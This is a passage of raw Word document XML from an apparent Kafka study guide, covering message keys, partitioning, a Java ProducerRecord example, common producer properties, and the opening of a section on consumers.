          <v:rect id="_x0000_i3102" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="140C3F93" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Why Key is Importa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39"/>
        <w:gridCol w:w="2293"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="31AA0B4E" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34EFB82E" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>With Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B799084" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Without Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="3BDA6E8E" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63808E6B" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Order preserved per key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55E48BF7" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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No order guarantee</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="55A44B1D" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45CFFFAC" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Enables grouping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57904B44" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Data scattered randomly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="42AAD793" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AE28874" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Helps in consistent hashing → efficient processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F9999B6" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F1CF101" w14:textId="77777777" w:rsidR="001E64A1"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669B7C6">
          <v:rect id="_x0000_i3103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04567B99" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D053F5" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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ProducerRecord&lt;String, String&gt; record = new ProducerRecord&lt;&gt;("user-logins", "user123", "login at 10AM");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47319A65" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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If topic user-logins has 3 partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FCFDF7" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1294"/>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Hash of "user123" will determine which of the 3 partitions the message goes to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A7CE71" w14:textId="77777777" w:rsidR="001E64A1"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0BC09B0">
          <v:rect id="_x0000_i3104" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A77322" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kafka Producer Properties (Comm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4"/>
        <w:gridCol w:w="3809"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="356A7FA3" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AF8AE07" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Property</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="713911BD" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="4A68724F" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51AF7358" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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bootstrap.servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52E8DCB8" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Kafka broker list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="03AFD45E" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23F61705" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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key.serializer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32DDD7E2" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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How to serialize key (e.g., StringSerializer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="2CB59629" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B72D6C5" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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value.serializer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FA5F505" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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How to serialize value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="2921B4B8" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D4E7876" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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acks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56703157" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Message durability (0, 1, all)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="77A29962" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D1EAFB8" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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retries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D47D426" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Number of retries if send fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="689BF5F1" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33E32DE0" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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linger.ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D63CC28" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Delay to allow batching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="5BB2CDB6" w14:textId="77777777" w:rsidTr="001E64A1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42370F78" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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batch.size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55593E2B" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Batch size in bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="758AB401" w14:textId="77777777" w:rsidR="001E64A1"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8CC67DA">
          <v:rect id="_x0000_i3105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="652871FD" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9D8D7" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1295"/>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Kafka producer </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sends data to topics</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF09975" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1295"/>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Each topic is divided into </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323BDFD1" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1295"/>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Keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> help decide </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>which partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data goes to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E062540" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1295"/>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Proper partitioning = </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>efficient consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCFD74E" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001E64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4B8D189">
          <v:rect id="_x0000_i3106" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="694BCB6C" w14:textId="2A220D2C" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="007C61B8" w:rsidP="007C61B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="772" w:name="_Toc196308252"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Kafka consumer, and how does it consume messages?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="772"/>
    </w:p>
    <w:p w14:paraId="483B90BB" w14:textId="5533AB83" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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What is a Kafka Consumer?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C3578" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a client application that </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reads (consumes)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data from </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka topics</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0C06C6" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1296"/>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It </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
